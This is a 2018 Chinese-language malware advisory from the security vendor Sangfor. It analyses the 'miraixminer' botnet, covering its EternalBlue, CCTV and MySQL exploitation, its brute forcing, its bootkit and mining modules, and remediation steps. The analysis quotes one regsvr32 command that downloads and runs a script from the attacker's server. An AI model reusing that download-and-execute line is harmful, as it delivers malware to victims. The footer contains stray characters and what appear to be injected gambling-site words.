news

/ 2018-12-06

近日,深信服安全团队跟踪到一新型的物联网僵尸网络,其融合了多种已知病毒家族的特点,包括mirai物联网僵尸网络病毒、mykings僵尸网络病毒、暗云木马、挖矿等,传播方式包括利用永恒之蓝漏洞、闭路电视物联网设备漏洞、mysql漏洞等也包括rdp爆破和telnet爆破等弱口令爆破。

深信服已将其命名为miraixminer,并且制定了完善的防御措施。现发布安全预警,提醒广大用户防范miraixminer攻击。

病毒名称:miraixminer

病毒性质:僵尸网络病毒、暗云木马、挖矿病毒等

影响范围:目前国内已有感染案例

危害等级:高危

传播方式利用永恒之蓝漏洞、闭路电视物联网设备漏洞、mysql漏洞等也包括rdp爆破和telnet爆破等弱口令爆破。


病毒分析

01

攻击流程


具体流程如下:

1. 病毒母体msinfo.exe通过注册服务&写入恶意代码到数据库的手段,实现持久化攻击。


2. 根据c&c命令从云端下载任意的攻击模块,此次的攻击模块为csrs.exe。


3. 添加恶意特权账户admin$。


4.从黑客服务器下载三个子模块后门模块、dns劫持模块、净化下载挖矿模块。


5. 后门模块up.rar经过分析发现为有名的bootkit暗云木马。


6. u.exe通过篡改dns配置文件达到劫持dns的目的。


7. 净化模块upsnew2.exe的功能很多,除了杀死同行病毒,添加自启动项以外,还会停止windows自动更新服务,以更稳定地控制受害主机。


8. 使用扫描工具和mirai攻击库对内网设备进行大范围攻击。


9. 最后,母体msinfo.exe会连接云端,自动更新病毒,实时下载最新的攻击模块。


02

传播模块

最开始通过arp进行扫描操作确认mac地址等信息:


扫描445端口,如下所示:


通过内置的masscan程序进行扫描,如下所示:


对扫描到的目标,进行相应的攻击行为,如下所示:


1、执行永恒之蓝攻击行为crackerms17-010:


2、攻击cctv物联网设备漏洞crackercctv:


3、攻击mysql漏洞crackermysql:


然后执行下面的数据库payload命令过程,如下所示:


将如下恶意代码写入数据库存储过程中,如下所示:


恶意代码分别为

对rdp进行攻击crackerrdp:


对telnet进行攻击crackertelnet:


03

创建admin$账号

从服务器上下载相应的配置文件,然后解密,如下所示:


然后解密出相应的xml文件,进行下载执行恶意程序操作:


下载回来的csrs是一个python脚本编写后生成的exe,主要是一个exploit,用于通过ms17-010漏洞,添加帐号:


添加之后的主机,如下图所示:


执行ms17-010漏洞攻击:


其中,攻击的参数如下所示:


04

挖矿与暗云木马

下载恶意程序,通过start regsvr32 /s /u /n /i:http://up.ms1128.site:8888\\s1.txt scrobj.dll,如下所示:


解密出上面的xml脚本:

upsnew2释放暗云木马item.dat以及c3.bat脚本。

其中c3.bat脚本功能分别为:

1、清除其他病毒。


2、开启mssqlserver。

3、在注册表以及任务计划中添加自启动。



4、关闭自动更新。

5、加载暗云木马。

6、配置防火墙策略,关闭135、137、138、139、445端口,防止再被其它病毒感染。

凯发登录的解决方案

1、隔离感染主机:已中毒计算机尽快隔离,关闭所有网络连接,禁用网卡。

2、切断传播途径:关闭潜在终端的smb 445等网络共享端口,关闭异常的外联访问。深信服下一代防火墙用户,可开启ips和僵尸网络功能(需升级到20181204版本),进行封堵。

3、查找攻击源:借助深信服安全感知平台检测内网攻击源。

4、查杀病毒:推荐使用深信服终端安全检测响应平台edr进行查杀,病毒库需升级到20181204版本。

5、修补漏洞:打上永恒之蓝ms17-010等漏洞相关补丁。


  • / 2020-01-06
  • / 2020-01-06
  • / 2020-01-06

©2000-2020    深信服科技股份有限公司    凯发注册网站的版权所有   

"));
网站地图